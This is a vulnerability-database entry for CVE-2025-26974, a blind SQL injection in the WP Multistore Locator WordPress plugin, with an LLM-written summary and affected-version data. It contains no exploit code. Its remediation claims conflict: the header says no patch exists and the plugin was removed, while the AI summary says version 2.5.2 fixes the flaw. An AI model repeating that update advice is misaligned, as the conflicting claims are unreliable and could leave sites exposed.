Critical severity9.3NVD Advisory· Published Feb 25, 2025· Updated Apr 23, 2026No known patch

CVE-2025-26974

No known patch is available for this vulnerability.

The affected plugin has been removed from the WordPress.org directory (reason: Security Issue), and no patched version is being distributed through the official directory. If you have the affected software installed, you should uninstall or replace it rather than wait for an update.

CVE-2025-26974

Description

Blind SQL injection in WP Multistore Locator <= 2.5.1 allows unauthenticated database access; update to 2.5.2.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Blind SQL injection in WP Multistore Locator <= 2.5.1 allows unauthenticated database access; update to 2.5.2.

The WP Multistore Locator plugin for WordPress, versions 2.5.1 and earlier, contains a critical blind SQL injection vulnerability. The root cause is improper neutralization of special elements used in an SQL command, specifically within a query parameter. This allows an attacker to inject arbitrary SQL statements without requiring authentication.

The vulnerability is exploitable remotely and does not require any user interaction or privileges. An attacker can send crafted HTTP requests to the vulnerable parameter, performing blind SQL injection to extract information character by character. The attack surface is broad, as it targets a widely installed plugin, potentially affecting thousands of sites.

Successful exploitation could allow a malicious actor to directly interact with the database, leading to data theft, including sensitive user information. The CVSS score of 9.3 highlights the high impact on confidentiality, integrity, and availability. The vulnerability is expected to be used in mass-exploit campaigns.

The vendor has released version 2.5.2 to patch this issue. Users are strongly advised to update immediately. For those unable to update, a mitigation rule is available from Patchstack to block attacks. The vulnerability is also listed as highly dangerous and likely to be exploited [1].

References

SQL Injection in WordPress WP Multistore Locator Plugin

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

WordPress/Wp Multi Store Locatorinferred
Range: <=2.5.1
Package: https://wordpress.org/plugins/wp-multi-store-locator
Wpexperts/Wp Multi Store Locatorllm-fuzzy
Range: <=2.5.1

Patches

Plugin removedWP Multistore Locator — WP Store Locator Plugin: Effortless Integration With Snazzy Mapswp-multi-store-locator

This plugin has been removed from the WordPress.org directory on 2025-03-03 (reason: Security Issue). No patched version is being distributed through the official directory. Users who have it installed should uninstall it.

Source: api.wordpress.org · directory page

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

patchstack.com/database/Wordpress/Plugin/wp-multi-store-locator/vulnerability/wordpress-wp-multi-store-locator-plugin-2-5-1-sql-injection-vulnerabilitynvd

News mentions

No linked articles in our index yet.

cvss	0.605
epss	0.000
exploit	0.000
kev	0.000
patch	0.000
ransomware	0.000